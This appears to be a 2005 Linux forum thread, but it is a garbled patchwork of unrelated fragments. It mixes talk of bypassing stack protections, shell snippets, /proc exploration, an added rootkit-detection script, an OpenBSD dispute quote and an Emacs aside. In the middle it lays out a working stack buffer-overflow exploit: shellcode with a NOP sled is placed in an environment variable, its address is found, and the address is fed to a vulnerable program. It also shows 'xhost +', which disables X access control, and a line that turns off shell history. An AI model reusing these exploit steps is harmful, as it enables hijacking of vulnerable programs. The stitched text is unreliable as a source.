Unix / Linux Discussion / Re: How to rm yourself
« on: August 14, 2005, 07:11:01 pm »
I'm guessing you also have no way to root me.
But at any rate, those aren't 100% reliable. They're mitigating factors, for sure, but they might not save me from an SMF SQL-injection attack that cleverly evades the IPS, or an Apache format-string vuln that lets me overwrite some key address in Apache, giving me unlimited access or something?
Then you don't use the stack.
So you see there are always ways around those kernel security modules. Ways around non-exec stacks, and your stack randomization.
For instance, if you're running the current version of Apache httpd, you still are not safe from attacks on Apache httpd, because someone could have found a vuln. And guess what, there isn't a patch out yet. So unfortunately, your only chance would be to plug the 0day vuln holes by coding your own patch.
export PS1=`echo -ne "\033[0;34m\u@\h:\033[0;36m\w\033[0;34m\$\033[0;37m "`
export CDPATH=.:~
export HISTSIZE=0
export TMOUT=600
sh-3.00$ set | grep DISPLAY
DISPLAY=:0.0
sh-3.00$ xhost +
access control disabled, clients can connect from any host
sh-3.00$ su -
Password:
root@tmp:~# export DISPLAY=:0.0
root@tmp:~# ethereal
sh-3.00$ cat << EOF > ~/.bashrc
> alias ps='ps aux'
> EOF
sh-3.00$ bash -ic ps | grep xterm
tmp 2659 0.0 0.8 5736 2304 tty1 S Jul15 0:00 xterm -title Terminal
tmp 3909 0.0 1.3 5972 3464 tty1 S 02:22 0:00 xterm -title Terminal
tmp 3978 0.0 0.2 1688 600 pts/3 S+ 02:28 0:00 grep xterm
export SHELLCODE=`perl -e 'print "\x90"x200;'``cat shellcode`
#include <stdio.h>
#include <stdlib.h>
/* Print the address at which the named environment variable is stored. */
int main(int argc, char *argv[]) {
    char *addr = getenv(argv[1]);
    printf("\n%p\n", addr);
    return 0;
}
sh-3.00$ getenv SHELLCODE
SHELLCODE is located at 0xbffff892
sh-3.00$ ./vulnprog `perl -e 'print "\x92\xf8\xff\xbf"x10;'`
The thing about finding your root password is that, if a user can access that file, they already have root on your system.
root@tmp:/proc/1# ls -l
total 0
-r--r--r-- 1 root root 0 2005-06-24 00:43 cmdline
lrwxrwxrwx 1 root root 0 2005-06-24 00:43 cwd -> //
-r-------- 1 root root 0 2005-06-24 00:43 environ
lrwxrwxrwx 1 root root 0 2005-06-24 00:43 exe -> /sbin/init*
dr-x------ 2 root root 0 2005-06-24 00:43 fd/
-r--r--r-- 1 root root 0 2005-06-24 00:43 maps
-rw------- 1 root root 0 2005-06-24 00:43 mem
-r--r--r-- 1 root root 0 2005-06-24 00:43 mounts
lrwxrwxrwx 1 root root 0 2005-06-24 00:43 root -> //
-r--r--r-- 1 root root 0 2005-06-24 00:43 stat
-r--r--r-- 1 root root 0 2005-06-24 00:43 statm
-r--r--r-- 1 root root 0 2005-06-24 00:43 status
root@tmp:/proc/1# cat environ | tr '\0' '\n'
HOME=/
TERM=linux
BOOT_IMAGE=linux
root@tmp:/proc# ls -l kcore
-r-------- 1 root root 279457792 2005-06-24 00:33 kcore
root@tmp:/proc/1# ls -d /proc/* | grep [0-9] | wc -l ; ps ax | wc -l
74
74
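The one-liner above only compares the number of PIDs in /proc with the number of lines ps prints. The script below is an added example, not the poster's code: it compares the two PID lists themselves, so a process that is visible in /proc but filtered out of ps output (the classic sign of a userland rootkit) is named rather than just counted. It assumes a POSIX sh, awk, sed and a ps that accepts -e -o pid=.

```shell
#!/bin/sh
# Added example: list PIDs present in /proc but missing from ps output.
# A hit can mean a rootkit hiding processes from ps, or simply a process
# that exited between the two readings, so re-run before concluding anything.

# compare_pid_lists PROC_PIDS PS_PIDS
# Both arguments are newline-separated PID lists; prints the PIDs found in
# the first list but not in the second, one per line (nothing if none).
compare_pid_lists() {
    { printf '%s\n' "$2" | sed 's/^/ps /'
      printf '%s\n' "$1" | sed 's/^/proc /'; } |
    awk '$2 ~ /^[0-9]+$/ {
            if ($1 == "ps") seen[$2] = 1          # remember what ps reported
            else if (!($2 in seen) && !dup[$2]++) print $2
         }'
}

# hidden_pids_live: take a /proc snapshot via the shell's own glob (no child
# process is forked, so the snapshot contains no PID of our own making),
# then ask ps and report the difference.
hidden_pids_live() {
    set -- /proc/[0-9]*
    proc_pids=$(for d in "$@"; do echo "${d#/proc/}"; done)
    ps_pids=$(ps -e -o pid=)
    compare_pid_lists "$proc_pids" "$ps_pids"
}

# Run the live check only when asked: sh hidden_pids.sh live
case "${1:-}" in
    live) hidden_pids_live ;;
esac
```

Every reported PID can be inspected directly with ls -l /proc/PID and cat /proc/PID/status, exactly as done for PID 1 above.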
So yes, it takes a while to install, but I feel it's worth it because I can control just about everything that gets installed.
Claim: OpenBSD cannot protect against attacks using mprotect because it would violate POSIX, and OpenBSD does not violate POSIX.
> > We don't break anything that standards defacto standards require. (Theo de Raadt)
> You do break POSIX as pointed out above. (PaX Team)
> > False. Now go away. (Theo de Raadt)
I was asked by a few OpenBSD people why I'm even comparing them here, since "everyone knows" they don't scale well and their goal is security and not scalability.
Also, to use emacs to its fullest, I'd like to learn how to make extensions for it which are written in Lisp.